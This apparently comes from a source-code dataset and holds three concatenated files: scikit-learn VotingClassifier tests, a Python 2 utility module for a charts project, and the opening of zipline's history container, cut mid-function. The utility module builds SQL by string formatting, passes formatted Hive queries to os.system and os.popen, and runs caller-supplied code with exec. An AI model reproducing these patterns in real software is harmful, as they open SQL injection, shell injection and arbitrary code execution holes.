X = np.array([[-1.1, -1.5], [-1.2, -1.4], [-3.4, -2.2], [1.1, 1.2]])
y = np.array([1, 1, 2, 2])
clf1_res = np.array([[0.59790391, 0.40209609],
[0.57622162, 0.42377838],
[0.50728456, 0.49271544],
[0.40241774, 0.59758226]])
clf2_res = np.array([[0.8, 0.2],
[0.8, 0.2],
[0.2, 0.8],
[0.3, 0.7]])
clf3_res = np.array([[0.9985082, 0.0014918],
[0.99845843, 0.00154157],
[0., 1.],
[0., 1.]])
t00 = (2*clf1_res[0][0] + clf2_res[0][0] + clf3_res[0][0]) / 4
t11 = (2*clf1_res[1][1] + clf2_res[1][1] + clf3_res[1][1]) / 4
t21 = (2*clf1_res[2][1] + clf2_res[2][1] + clf3_res[2][1]) / 4
t31 = (2*clf1_res[3][1] + clf2_res[3][1] + clf3_res[3][1]) / 4
eclf = VotingClassifier(estimators=[
('lr', clf1), ('rf', clf2), ('gnb', clf3)],
voting='soft',
weights=[2, 1, 1])
eclf_res = eclf.fit(X, y).predict_proba(X)
assert_almost_equal(t00, eclf_res[0][0], decimal=1)
assert_almost_equal(t11, eclf_res[1][1], decimal=1)
assert_almost_equal(t21, eclf_res[2][1], decimal=1)
assert_almost_equal(t31, eclf_res[3][1], decimal=1)
try:
eclf = VotingClassifier(estimators=[
('lr', clf1), ('rf', clf2), ('gnb', clf3)],
voting='hard')
eclf.fit(X, y).predict_proba(X)
except AttributeError:
pass
else:
raise AssertionError('AttributeError for voting == "hard"'
' and with predict_proba not raised')
def test_multilabel():
"""Check if error is raised for multilabel classification."""
X, y = make_multilabel_classification(n_classes=2, n_labels=1,
allow_unlabeled=False,
random_state=123)
clf = OneVsRestClassifier(SVC(kernel='linear'))
eclf = VotingClassifier(estimators=[('ovr', clf)], voting='hard')
try:
eclf.fit(X, y)
except NotImplementedError:
return
def test_gridsearch():
"""Check GridSearch support."""
clf1 = LogisticRegression(random_state=1)
clf2 = RandomForestClassifier(random_state=1)
clf3 = GaussianNB()
eclf = VotingClassifier(estimators=[
('lr', clf1), ('rf', clf2), ('gnb', clf3)],
voting='soft')
params = {'lr__C': [1.0, 100.0],
'voting': ['soft', 'hard'],
'weights': [[0.5, 0.5, 0.5], [1.0, 0.5, 0.5]]}
grid = GridSearchCV(estimator=eclf, param_grid=params, cv=5)
grid.fit(iris.data, iris.target)
| bsd-3-clause |
popoyz/charts | common/utils.py | 1 | 19081 | # coding=utf-8
from __base__.error import APIError
import os
import re
import urllib2
import urllib
from decimal import Decimal
import json
import glob
import time
from traceback import format_exc
from pandas import DataFrame, Series
import pandas as pd
import numpy as np
from collections import Iterable as IterType
from logging import getLogger, DEBUG
from types import StringTypes
logger = getLogger()
logger.setLevel(DEBUG)
def is_chinese(uchar):
"""判断一个unicode是否是汉字"""
if uchar >= u'\u4e00' and uchar <= u'\u9fa5':
return True
else:
return False
def is_number(uchar):
"""判断一个unicode是否是数字"""
if uchar >= u'\u0030' and uchar <= u'\u0039':
return True
else:
return False
def is_alphabet(uchar):
"""判断一个unicode是否是英文字母"""
if (uchar >= u'\u0041' and uchar <= u'\u005a') or (uchar >= u'\u0061' and uchar <= u'\u007a'):
return True
else:
return False
def is_other(uchar):
"""判断是否非汉字,数字和英文字符"""
if not (is_chinese(uchar) or is_number(uchar) or is_alphabet(uchar)):
return True
else:
return False
def strQ2B(ustring):
"""全角转半角"""
rstring = ""
for uchar in ustring:
inside_code = ord(uchar)
if inside_code == 12288: # 全角空格直接转换
inside_code = 32
elif (inside_code >= 65281 and inside_code <= 65374): # 全角字符(除空格)根据关系转化
inside_code -= 65248
rstring += unichr(inside_code)
return rstring
def dictToSql(data, inner=None, outer=None):
result = {}
if data:
if type(inner) == list:
for key in inner:
if key in data:
result[key] = r"`{}`='{}'".format(key, data[key])
else:
for key in data:
result[key] = r"`{}`='{}'".format(key, data[key])
if type(outer) == list:
for key in outer:
if key in data:
del data[key]
return result.values()
def defaultencode(obj):
if isinstance(obj, Decimal):
# Subclass float with custom repr?
return fakefloat(obj)
import calendar, datetime, time
if isinstance(obj, datetime.datetime):
return "{}".format(obj)
if isinstance(obj, datetime.date):
return "{}".format(obj)
raise TypeError(repr(obj) + " is not JSON serializable")
class fakefloat(float):
def __init__(self, value):
self._value = value
def __repr__(self):
return str(self._value)
def get_trans_punc_func():
"""中文标点转换为英文标点"""
punc_mapping = {
u'“': u'"',
u'”': u'"',
u'·': u'.',
u'。': u'.',
u'!': u'!',
u'……': u'......',
u'(': u'(',
u')': u')',
u'——': u'--',
u'【': u'[',
u'】': u']',
u'{': u'{',
u'}': u'}',
u'‘': u'\'',
u'’': u'\'',
u',': u',',
u'?': u'?',
u':': u':',
u';': u';',
u'《': u'<',
u'》': u'>'
}
def _transform_punctuation(ustring):
char_list = []
for c in ustring:
if c in punc_mapping:
char_list.append(punc_mapping[c])
else:
char_list.append(c)
return ''.join(char_list)
return _transform_punctuation
transform_punctuation = get_trans_punc_func()
def _get_dedup_empty():
"""将连续空白符替换成单个空白符"""
import re
multi_empty_p = re.compile(r'\s{2,}')
def _dedup_empty(ustr):
return multi_empty_p.subn(u' ', ustr)[0]
return _dedup_empty
dedup_empty = _get_dedup_empty()
def _get_remove_bracket():
"""去掉括号内的信息"""
import re
bracket_p = re.compile(r'(\(.*\))')
def _remove_bracket(ustr):
return bracket_p.subn(u'', ustr)[0]
return _remove_bracket
remove_bracket = _get_remove_bracket()
def split_by_cn_en(ustring):
"""将ustring按照中文,字母分开"""
retList = []
utmp = []
_state = 0 # 0非中文,1非英文
_split = False # 当前状态是否产生一个分割
for uchar in ustring:
if is_chinese(uchar):
if _state == 0:
_split = True
_state = 1
elif is_alphabet(uchar):
if _state == 1:
_split = True
_state = 0
if _split:
if len(utmp) > 0:
retList.append(''.join(utmp))
utmp = []
_split = False
utmp.append(uchar)
if len(utmp) > 0:
retList.append(''.join(utmp))
return retList
from datetime import datetime, timedelta
def get_lastmonth_str(date_str):
month_obj = datetime.strptime(date_str, '%Y-%m-%d').date()
last_month = month_obj - timedelta(days=1)
return '%d-%02d-01' % (last_month.year, last_month.month)
def get_lastyearmonth_str(date_str):
month_obj = datetime.strptime(date_str, '%Y-%m-%d').date()
last_year = month_obj - timedelta(days=365)
return '%d-%02d-01' % (last_year.year, last_year.month)
def normalize_str4brand(u_str, encoding='utf-8'):
if not isinstance(u_str, unicode) and isinstance(u_str, str):
u_str = u_str.decode(encoding)
assert isinstance(u_str, unicode)
u_str = u_str.lower()
u_str = strQ2B(u_str)
u_str = transform_punctuation(u_str)
u_str = dedup_empty(u_str)
u_str = u_str.strip()
u_str = remove_bracket(u_str)
return u_str
def cluster_brands(brands_list, one_one_mapping=None, kw_mapping=None, kw_match=1.0, split_symbol='/', cn_split=False):
'''
brands_list - 待进行聚类的品牌列表。顺序很重要,同一类别内的品牌,排在第一个的将作为主品牌
one_one_mapping - 一对一映射,仅接受dict类型参数。内容为 alias -> principle brand。
kw_mapping - 品牌的关键词映射,格式为 主品牌 -> set(关键词1, 关键词2 ...)
kw_match - 在进行关键词匹配时,若该值为整型则至少要匹配上这么多个关键词,并以匹配上最多的作为主品牌;若为浮点型,则至少要匹配上该浮点数表示的百分比的关键词。
split_symbol - 对于brands_list中的品牌,使用该符号进行切分以得到品牌关键词
cn_split - 是否进行中英文切分,若设置成True,则会在中英文分界处进行切分
'''
if one_one_mapping is None:
one_one_mapping = {}
if kw_mapping is None:
kw_mapping = {}
_tmp_one_one_mapping = {}
for alias, principle in one_one_mapping.items():
_tmp_one_one_mapping[normalize_str4brand(alias)] = principle
_tmp_kw_mapping = {}
for principle, kw_set in kw_mapping.items():
for kw in kw_set:
_tmp_kw_mapping[normalize_str4brand(kw)] = principle
brands_cluster = {} # brand -> set of brands
for brand in brands_list:
normalized_brand = normalize_str4brand(brand)
# direct one one mapping
one_one_brand = _tmp_one_one_mapping.get(normalized_brand, None)
if one_one_brand:
if one_one_brand not in brands_cluster:
brands_cluster[one_one_brand] = set()
brands_cluster[one_one_brand].add(brand) # 最终输出的聚类内部都是归一化前的
continue
one_one_brand = _tmp_one_one_mapping.get(brand, None)
if one_one_brand:
if one_one_brand not in brands_cluster:
brands_cluster[one_one_brand] = set()
brands_cluster[one_one_brand].add(brand) # 最终输出的聚类内部都是归一化前的
continue
# try kw match
if split_symbol:
symbol_kw_set = set(normalized_brand.split(split_symbol))
else:
symbol_kw_set = set([normalized_brand, ])
if cn_split:
kw_set = set()
for kw in symbol_kw_set:
kw_set.update(split_by_cn_en(kw))
else:
kw_set = symbol_kw_set
candidate_dict = {} # principle -> count
for kw in kw_set:
principle = _tmp_kw_mapping.get(kw, None)
if principle:
if principle not in candidate_dict:
candidate_dict[principle] = 0
candidate_dict[principle] += 1
if candidate_dict:
candidate_tuple_list = sorted(candidate_dict.items(), key=lambda k: k[1], reverse=True)
found = False
if isinstance(kw_match, float):
percent = candidate_tuple_list[0][1] * 1.0 / len(kw_set)
if percent >= kw_match:
found = True
elif isinstance(kw_match, int):
if candidate_tuple_list[0][1] >= kw_match:
found = True
else:
raise TypeError("Need float or int")
if found:
if candidate_tuple_list[0][0] not in brands_cluster:
brands_cluster[candidate_tuple_list[0][0]] = set()
brands_cluster[candidate_tuple_list[0][0]].add(brand)
# 将当前品牌的关键词加到主品牌的关键词列表中,以扩大召回
for kw in kw_set:
if kw not in _tmp_kw_mapping:
_tmp_kw_mapping[kw] = candidate_tuple_list[0][0]
continue
# cluster
brands_cluster[brand] = set([brand, ])
for kw in kw_set:
if kw not in _tmp_kw_mapping:
_tmp_kw_mapping[kw] = brand
return brands_cluster
def array_column(data, format, format_str=False):
"""取list或者dict 二级下面的某列,比如 直接从数据库返回的结果我想取name列,[{'name':'fds','id':1},{'name':'fdsa','id':2}]"""
result = []
if type(format) == str:
if format.strip() == '':
pass
else:
if type(data) == list:
for i in data:
if format_str and (type(i[format]) == datetime.date or type(i[format]) == datetime.datetime):
result.append(i[format].isoformat())
else:
result.append(i[format])
elif type(data) == dict:
for idx, i in enumerate(data):
if format_str and (type(i[format]) == datetime.date or type(i[format]) == datetime.datetime):
result.append(i[format].isoformat())
else:
result.append(i[format])
return result
def dbFormatToDict(data, format):
"""从list或者dict里面以某列数据作为dict 的index 比如从数据库返回的结果我将name列作为index变为dict,[{'name':'fds','id':1},{'name':'fdsa','id':2}]"""
result = {}
if type(format) == str:
if format.strip() == '':
result = data
else:
for i in data:
result[i[format]] = i
elif (type(format) == list and format) or (type(format) == dict and format):
for i in data:
index = ''
for j in format:
index += i[j]
result[index] = i
return result
def _format_hql(content):
return content.replace('`', '')
def heqExec(hql):
if os.system('''hive -e "{}" >/dev/null 2>&1'''.format(_format_hql(hql))):
return False
else:
return True
def is_exist_hive(table):
if os.system(''' hive -e "show create table {};" '''.format(_format_hql(table))):
return False
else:
return True
def sumStr(string):
from hashlib import md5
m = md5()
m.update(string.encode('utf-8'))
return m.hexdigest()
def get_hive_column(h_table):
p = os.popen(''' hive -e "desc {};" '''.format(h_table))
table_info = p.read().decode('utf-8')
result = []
part = []
table_info = table_info.split('\n')
for item in table_info:
m = item.split('\t')
m = m[0].strip()
if "#" in m or not m:
pass
elif m not in result:
result.append(m)
elif m in result:
part.append(m)
if p.close():
result = []
part = []
return [result, part]
def get_hive_location(h_table):
p = os.popen(''' hive -e "desc formatted {};" '''.format(h_table))
table_info = p.readlines()
location = ''
if table_info:
for item in table_info:
item = item.decode('utf-8')
if 'Location:' in item and 'hdfs:' in item and 'db' in item:
table = item.split("\t", 1)
location = table[1].strip()
if p.close():
location = ''
return location
def get_partitions(h_table):
p = os.popen(''' hive -e "show partitions {};"|tail -n1 '''.format(h_table))
table_info = p.readlines()
result = ''
if table_info:
for item in table_info:
item = item.decode('utf-8')
result = item
if p.close():
result = ''
return result
def get_uniquekey(db, table):
result = ''
_match = re.compile(r"(`.*`)")
try:
p = db.query('show create table {};'.format(table))
for it in p:
it = it['Create Table']
it = it.split('\n')
for item in it:
if 'PRIMARY KEY'.lower() in item.lower():
result = _match.search(item).group(0).replace("`", "")
if 'UNIQUE key'.lower() in item.lower() or 'UNIQUE index'.lower() in item.lower():
result = _match.search(item).group(0).replace("`", "")
except Exception, e:
from traceback import print_exc
print_exc()
return result
pass
def handle_hive_sort(create_sql):
return create_sql
sql = ''
if create_sql:
create_sql = create_sql.lower()
create_sql = re.sub(";(\s)*$", "", create_sql).strip()
if 'stored as' in create_sql:
sql = create_sql
else:
_p = re.compile('\(.*\).*(location.*)')
m = _p.search(create_sql)
if m:
s = m.groups()
if s:
_m = s[-1]
sql = create_sql.replace(r'{}'.format(_m), ' STORED AS RCFILE {}'.format(_m))
else:
sql = "{} STORED AS RCFILE".format(create_sql)
return sql + ";"
def get_json_hierarchy(_json_obj, arch_ele_list):
for e in arch_ele_list:
if e not in _json_obj:
return None
_json_obj = _json_obj[e]
return _json_obj
def format_ifram_url(url, search):
return url.replace(r"query:'*'", r"query:'{}'").format(search).replace(r'height="600" width="800"',
r'height="352" width="100%"')
def _req_url(url, data=None, repeat=4):
data = json.dumps(data or {})
for _ in range(repeat):
try:
logger.debug("Request {}".format(url))
return urllib2.urlopen(urllib2.Request(url, data)).read()
except Exception, e:
logger.error(format_exc())
raise APIError(u"获取不到数据,{}!".format(e))
def _req_url_body(url, data, isput=False):
repeat = 4
req = ''
data = json.dumps(data)
for j in range(repeat):
# try:
res = urllib2.Request(url, data, {'Content-Type': 'application/json'})
if isput:
res.get_method = lambda: 'PUT'
req = urllib2.urlopen(res).read()
break
# except Exception, e:
# pass
if req == '':
raise Exception(url + u"获取不到数据")
return req
def get_py_file(dirs):
result = []
if dirs:
for item in glob.glob(dirs):
module_name, ext = os.path.splitext(os.path.basename(item))
if ext == ".py" and not module_name.startswith("__"): # 不能是下划线开头
result.append(module_name)
return result
def defaultnumber(object):
try:
return int(object)
except ValueError:
try:
return float(object)
except ValueError:
pass
return object
def format_number(rows):
conv = lambda value: defaultnumber(value.replace(",", "")) if isinstance(value, StringTypes) else value
return [dict((key, conv(value)) for key, value in row.items()) for row in rows]
def data_trans(data, columns_names, code, istable=True):
if columns_names:
data = DataFrame([x for x in format_number(data)], columns=columns_names)
else:
data = DataFrame([x for x in format_number(data)])
try:
if code:
exec code
result = trans(data).fillna('')
else:
result = data.fillna('')
if istable:
result = to_table(result)
return result
except Exception, e:
from traceback import print_exc
print_exc()
return False
def muti_data_trans(data, code, istable=True):
try:
if not code:
code = "def trans(frame):\n return frame[0]"
exec code
result = trans(data).fillna('')
if istable:
result = to_table(result)
return result
except Exception, e:
from traceback import print_exc
print_exc()
return False
def to_table(frame):
columns = frame.columns
indexs = frame.index
if indexs.name:
header = [indexs.name] + columns.values.tolist()
else:
header = columns.values.tolist()
indexs_list = frame.index.values.tolist()
data = np.array(frame).tolist()
if indexs.name:
tmp = [item.insert(0, indexs_list[key]) for key, item in enumerate(data)]
data.insert(0, header)
return data
def to_dict(table, insert_header=[], isHeader=True):
header = table[0]
data = []
for key, item in enumerate(table):
if key != 0:
tmp = {}
for t_i in insert_header:
for t in t_i:
tmp[t] = t_i[t]
for k, it in enumerate(item):
tmp[header[k]] = it
data.append(tmp)
if isHeader:
if insert_header:
for t_i in insert_header:
for t in t_i:
header.insert(0, t)
return header, data
else:
return data
def get_time(isnow=True):
if isnow:
times = time.strftime("%Y-%m-%d %X", time.localtime(time.time()))
else:
times = "2038-01-01 00:00:00"
return times
# ============================================================================
def to_iter(items=()):
""" 转换为迭代类型
1 -> [1, ]
(1, 2) -> (1, 2)
"123" -> ["123", ]
"""
return items if isinstance(items, IterType) and not isinstance(items, basestring) else [items]
| lgpl-3.0 |
wubr2000/zipline | zipline/history/history_container.py | 18 | 33931 | #
# Copyright 2014 Quantopian, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from bisect import insort_left
from collections import namedtuple
from itertools import groupby, product
import logbook
import numpy as np
import pandas as pd
from six import itervalues, iteritems, iterkeys
from . history import HistorySpec
from zipline.finance.trading import with_environment
from zipline.utils.data import RollingPanel, _ensure_index
from zipline.utils.munge import ffill, bfill
logger = logbook.Logger('History Container')
# The closing price is referred to by multiple names,
# allow both for price rollover logic etc.
CLOSING_PRICE_FIELDS = frozenset({'price', 'close_price'})
def ffill_buffer_from_prior_values(freq,
field,
buffer_frame,
digest_frame,
pv_frame,
raw=False):
"""
Forward-fill a buffer frame, falling back to the end-of-period values of a
digest frame if the buffer frame has leading NaNs.
"""
# convert to ndarray if necessary
digest_values = digest_frame
if raw and isinstance(digest_frame, pd.DataFrame):
digest_values = digest_frame.values
buffer_values = buffer_frame
if raw and isinstance(buffer_frame, pd.DataFrame):
buffer_values = buffer_frame.values
nan_sids = pd.isnull(buffer_values[0])
if np.any(nan_sids) and len(digest_values):
# If we have any leading nans in the buffer and we have a non-empty
# digest frame, use the oldest digest values as the initial buffer
# values.
buffer_values[0, nan_sids] = digest_values[-1, nan_sids]
nan_sids = pd.isnull(buffer_values[0])
if np.any(nan_sids):
# If we still have leading nans, fall back to the last known values
# from before the digest.
key_loc = pv_frame.index.get_loc((freq.freq_str, field))
filler = pv_frame.values[key_loc, nan_sids]
buffer_values[0, nan_sids] = filler
if raw:
filled = ffill(buffer_values)
return filled
return buffer_frame.ffill()
def ffill_digest_frame_from_prior_values(freq,
field,
digest_frame,
pv_frame,
raw=False):
"""
Forward-fill a digest frame, falling back to the last known prior values if
necessary.
"""
# convert to ndarray if necessary
values = digest_frame
if raw and isinstance(digest_frame, pd.DataFrame):
values = digest_frame.values
nan_sids = pd.isnull(values[0])
if np.any(nan_sids):
# If we have any leading nans in the frame, use values from pv_frame to
# seed values for those sids.
key_loc = pv_frame.index.get_loc((freq.freq_str, field))
filler = pv_frame.values[key_loc, nan_sids]
values[0, nan_sids] = filler
if raw:
filled = ffill(values)
return filled
return digest_frame.ffill()
def freq_str_and_bar_count(history_spec):
"""
Helper for getting the frequency string and bar count from a history spec.
"""
return (history_spec.frequency.freq_str, history_spec.bar_count)
@with_environment()
def next_bar(spec, env):
"""
Returns a function that will return the next bar for a given datetime.
"""
if spec.frequency.unit_str == 'd':
if spec.frequency.data_frequency == 'minute':
return lambda dt: env.get_open_and_close(
env.next_trading_day(dt),
)[1]
else:
return env.next_trading_day
else:
return env.next_market_minute
def compute_largest_specs(history_specs):
"""
Maps a Frequency to the largest HistorySpec at that frequency from an
iterable of HistorySpecs.
"""
return {key: max(group, key=lambda f: f.bar_count)
for key, group in groupby(
sorted(history_specs, key=freq_str_and_bar_count),
key=lambda spec: spec.frequency)}
# tuples to store a change to the shape of a HistoryContainer
FrequencyDelta = namedtuple(
'FrequencyDelta',
['freq', 'buffer_delta'],
)
LengthDelta = namedtuple(
'LengthDelta',
['freq', 'delta'],
)
HistoryContainerDeltaSuper = namedtuple(
'HistoryContainerDelta',
['field', 'frequency_delta', 'length_delta'],
)
class HistoryContainerDelta(HistoryContainerDeltaSuper):
"""
A class representing a resize of the history container.
"""
def __new__(cls, field=None, frequency_delta=None, length_delta=None):
"""
field is a new field that was added.
frequency is a FrequencyDelta representing a new frequency was added.
length is a bar LengthDelta which is a frequency and a bar_count.
If any field is None, then no change occurred of that type.
"""
return super(HistoryContainerDelta, cls).__new__(
cls, field, frequency_delta, length_delta,
)
@property
def empty(self):
"""
Checks if the delta is empty.
"""
return (self.field is None and
self.frequency_delta is None and
self.length_delta is None)
def normalize_to_data_freq(data_frequency, dt):
if data_frequency == 'minute':
return dt
return pd.tslib.normalize_date(dt)
class HistoryContainer(object):
"""
Container for all history panels and frames used by an algoscript.
To be used internally by TradingAlgorithm, but *not* passed directly to the
algorithm.
Entry point for the algoscript is the result of `get_history`.
"""
VALID_FIELDS = {
'price', 'open_price', 'volume', 'high', 'low', 'close_price',
}
def __init__(self,
history_specs,
initial_sids,
initial_dt,
data_frequency,
bar_data=None):
"""
A container to hold a rolling window of historical data within a user's
algorithm.
Args:
history_specs (dict[Frequency:HistorySpec]): The starting history
specs that this container should be able to service.
initial_sids (set[Asset or Int]): The starting sids to watch.
initial_dt (datetime): The datetime to start collecting history from.
bar_data (BarData): If this container is being constructed during
handle_data, this is the BarData for the current bar to fill the
buffer with. If this is constructed elsewhere, it is None.
Returns:
An instance of a new HistoryContainer
"""
# History specs to be served by this container.
self.history_specs = history_specs
self.largest_specs = compute_largest_specs(
itervalues(self.history_specs)
)
# The set of fields specified by all history specs
self.fields = pd.Index(
sorted(set(spec.field for spec in itervalues(history_specs)))
)
self.sids = pd.Index(
sorted(set(initial_sids or []))
)
self.data_frequency = data_frequency
initial_dt = normalize_to_data_freq(self.data_frequency, initial_dt)
# This panel contains raw minutes for periods that haven't been fully
# completed. When a frequency period rolls over, these minutes are
# digested using some sort of aggregation call on the panel (e.g. `sum`
# for volume, `max` for high, `min` for low, etc.).
self.buffer_panel = self.create_buffer_panel(initial_dt, bar_data)
# Dictionaries with Frequency objects as keys.
self.digest_panels, self.cur_window_starts, self.cur_window_closes = \
self.create_digest_panels(initial_sids, initial_dt)
# Helps prop up the prior day panel against having a nan, when the data
# has been seen.
self.last_known_prior_values = pd.DataFrame(
data=None,
index=self.prior_values_index,
columns=self.prior_values_columns,
# Note: For bizarre "intricacies of the spaghetti that is pandas
# indexing logic" reasons, setting this dtype prevents indexing
# errors in update_last_known_values. This is safe for the time
# being because our only forward-fillable fields are floats. If we
# need to add a non-float-typed forward-fillable field, then we may
# find ourselves having to track down and fix a pandas bug.
dtype=np.float64,
)
_ffillable_fields = None
@property
def ffillable_fields(self):
if self._ffillable_fields is None:
fillables = self.fields.intersection(HistorySpec.FORWARD_FILLABLE)
self._ffillable_fields = fillables
return self._ffillable_fields
@property
def prior_values_index(self):
index_values = list(
product(
(freq.freq_str for freq in self.unique_frequencies),
# Only store prior values for forward-fillable fields.
self.ffillable_fields,
)
)
if index_values:
return pd.MultiIndex.from_tuples(index_values)
else:
# MultiIndex doesn't gracefully support empty input, so we return
# an empty regular Index if we have values.
return pd.Index(index_values)
@property
def prior_values_columns(self):
return self.sids
@property
def all_panels(self):
yield self.buffer_panel
for panel in self.digest_panels.values():
yield panel
@property
def unique_frequencies(self):
"""
Return an iterator over all the unique frequencies serviced by this
container.
"""
return iterkeys(self.largest_specs)
@with_environment()
def _add_frequency(self, spec, dt, data, env=None):
"""
Adds a new frequency to the container. This reshapes the buffer_panel
if needed.
"""
freq = spec.frequency
self.largest_specs[freq] = spec
new_buffer_len = 0
if freq.max_bars > self.buffer_panel.window_length:
# More bars need to be held in the buffer_panel to support this
# freq
if freq.data_frequency \
!= self.buffer_spec.frequency.data_frequency:
# If the data_frequencies are not the same, then we need to
# create a fresh buffer.
self.buffer_panel = self.create_buffer_panel(
dt, bar_data=data,
)
new_buffer_len = None
else:
# The frequencies are the same, we just need to add more bars.
self._resize_panel(
self.buffer_panel,
freq.max_bars,
dt,
self.buffer_spec.frequency,
)
new_buffer_len = freq.max_minutes
# update the current buffer_spec to reflect the new lenght.
self.buffer_spec.bar_count = new_buffer_len + 1
if spec.bar_count > 1:
# This spec has more than one bar, construct a digest panel for it.
self.digest_panels[freq] = self._create_digest_panel(
dt, spec=spec, env=env,
)
else:
self.cur_window_starts[freq] = dt
self.cur_window_closes[freq] = freq.window_close(
self.cur_window_starts[freq]
)
self.last_known_prior_values = self.last_known_prior_values.reindex(
index=self.prior_values_index,
)
return FrequencyDelta(freq, new_buffer_len)
def _add_field(self, field):
"""
Adds a new field to the container.
"""
# self.fields is already sorted, so we just need to insert the new
# field in the correct index.
ls = list(self.fields)
insort_left(ls, field)
self.fields = pd.Index(ls)
# unset fillable fields cache
self._ffillable_fields = None
self._realign_fields()
self.last_known_prior_values = self.last_known_prior_values.reindex(
index=self.prior_values_index,
)
return field
@with_environment()
def _add_length(self, spec, dt, env=None):
"""
Increases the length of the digest panel for spec.frequency. If this
does not have a panel, and one is needed; a digest panel will be
constructed.
"""
old_count = self.largest_specs[spec.frequency].bar_count
self.largest_specs[spec.frequency] = spec
delta = spec.bar_count - old_count
panel = self.digest_panels.get(spec.frequency)
if panel is None:
# The old length for this frequency was 1 bar, meaning no digest
# panel was held. We must construct a new one here.
panel = self._create_digest_panel(
dt, spec=spec, env=env,
)
else:
self._resize_panel(
panel, spec.bar_count - 1, dt, freq=spec.frequency, env=env,
)
self.digest_panels[spec.frequency] = panel
return LengthDelta(spec.frequency, delta)
@with_environment()
def _resize_panel(self, panel, size, dt, freq, env=None):
"""
Resizes a panel, fills the date_buf with the correct values.
"""
# This is the oldest datetime that will be shown in the current window
# of the panel.
oldest_dt = pd.Timestamp(panel.start_date, tz='utc',)
delta = size - panel.window_length
# Construct the missing dates.
missing_dts = self._create_window_date_buf(
delta, freq.unit_str, freq.data_frequency, oldest_dt,
)
panel.extend_back(missing_dts)
@with_environment()
def _create_window_date_buf(self,
window,
unit_str,
data_frequency,
dt,
env=None):
"""
Creates a window length date_buf looking backwards from dt.
"""
if unit_str == 'd':
# Get the properly key'd datetime64 out of the pandas Timestamp
if data_frequency != 'daily':
arr = env.open_close_window(
dt,
window,
offset=-window,
).market_close.astype('datetime64[ns]').values
else:
arr = env.open_close_window(
dt,
window,
offset=-window,
).index.values
return arr
else:
return env.market_minute_window(
env.previous_market_minute(dt),
window,
step=-1,
)[::-1].values
@with_environment()
def _create_panel(self, dt, spec, env=None):
"""
Constructs a rolling panel with a properly aligned date_buf.
"""
dt = normalize_to_data_freq(spec.frequency.data_frequency, dt)
window = spec.bar_count - 1
date_buf = self._create_window_date_buf(
window,
spec.frequency.unit_str,
spec.frequency.data_frequency,
dt,
env=env,
)
panel = RollingPanel(
window=window,
items=self.fields,
sids=self.sids,
initial_dates=date_buf,
)
return panel
@with_environment()
def _create_digest_panel(self,
dt,
spec,
window_starts=None,
window_closes=None,
env=None):
"""
Creates a digest panel, setting the window_starts and window_closes.
If window_starts or window_closes are None, then self.cur_window_starts
or self.cur_window_closes will be used.
"""
freq = spec.frequency
window_starts = window_starts if window_starts is not None \
else self.cur_window_starts
window_closes = window_closes if window_closes is not None \
else self.cur_window_closes
window_starts[freq] = freq.normalize(dt)
window_closes[freq] = freq.window_close(window_starts[freq])
return self._create_panel(dt, spec, env=env)
def ensure_spec(self, spec, dt, bar_data):
"""
Ensure that this container has enough space to hold the data for the
given spec. This returns a HistoryContainerDelta to represent the
changes in shape that the container made to support the new
HistorySpec.
"""
updated = {}
if spec.field not in self.fields:
updated['field'] = self._add_field(spec.field)
if spec.frequency not in self.largest_specs:
updated['frequency_delta'] = self._add_frequency(
spec, dt, bar_data,
)
if spec.bar_count > self.largest_specs[spec.frequency].bar_count:
updated['length_delta'] = self._add_length(spec, dt)
return HistoryContainerDelta(**updated)
def add_sids(self, to_add):
"""
Add new sids to the container.
"""
self.sids = pd.Index(
sorted(self.sids.union(_ensure_index(to_add))),
)
self._realign_sids()
def drop_sids(self, to_drop):
"""
Remove sids from the container.
"""
self.sids = pd.Index(
sorted(self.sids.difference(_ensure_index(to_drop))),
)
self._realign_sids()
def _realign_sids(self):
"""
Realign our constituent panels after adding or removing sids.
"""
self.last_known_prior_values = self.last_known_prior_values.reindex(
columns=self.sids,
)
for panel in self.all_panels:
panel.set_minor_axis(self.sids)
def _realign_fields(self):
self.last_known_prior_values = self.last_known_prior_values.reindex(
index=self.prior_values_index,
)
for panel in self.all_panels:
panel.set_items(self.fields)
@with_environment()
def create_digest_panels(self,
initial_sids,
initial_dt,
env=None):
"""
Initialize a RollingPanel for each unique panel frequency being stored
by this container. Each RollingPanel pre-allocates enough storage
space to service the highest bar-count of any history call that it
serves.
"""
# Map from frequency -> first/last minute of the next digest to be
# rolled for that frequency.
first_window_starts = {}
first_window_closes = {}
# Map from frequency -> digest_panels.
panels = {}
for freq, largest_spec in iteritems(self.largest_specs):
if largest_spec.bar_count == 1:
# No need to allocate a digest panel; this frequency will only
# ever use data drawn from self.buffer_panel.
first_window_starts[freq] = freq.normalize(initial_dt)
first_window_closes[freq] = freq.window_close(
first_window_starts[freq]
)
continue
dt = initial_dt
rp = self._create_digest_panel(
dt,
spec=largest_spec,
window_starts=first_window_starts,
window_closes=first_window_closes,
env=env,
)
panels[freq] = rp
return panels, first_window_starts, first_window_closes
def create_buffer_panel(self, initial_dt, bar_data):
"""
Initialize a RollingPanel containing enough minutes to service all our
frequencies.
"""
max_bars_needed = max(
freq.max_bars for freq in self.unique_frequencies
)
freq = '1m' if self.data_frequency == 'minute' else '1d'
spec = HistorySpec(
max_bars_needed + 1, freq, None, None, self.data_frequency,
)
rp = self._create_panel(
initial_dt, spec,
)
self.buffer_spec = spec
if bar_data is not None:
frame = self.frame_from_bardata(bar_data, initial_dt)
rp.add_frame(initial_dt, frame)
return rp
def convert_columns(self, values):
"""
If columns have a specific type you want to enforce, overwrite this
method and return the transformed values.
"""
return values
def digest_bars(self, history_spec, do_ffill):
"""
Get the last (history_spec.bar_count - 1) bars from self.digest_panel
for the requested HistorySpec.
"""
bar_count = history_spec.bar_count
if bar_count == 1:
# slicing with [1 - bar_count:] doesn't work when bar_count == 1,
# so special-casing this.
res = pd.DataFrame(index=[], columns=self.sids, dtype=float)
return res.values, res.index
field = history_spec.field
# Panel axes are (field, dates, sids). We want just the entries for
# the requested field, the last (bar_count - 1) data points, and all
# sids.
digest_panel = self.digest_panels[history_spec.frequency]
frame = digest_panel.get_current(field, raw=True)
if do_ffill:
# Do forward-filling *before* truncating down to the requested
# number of bars. This protects us from losing data if an illiquid
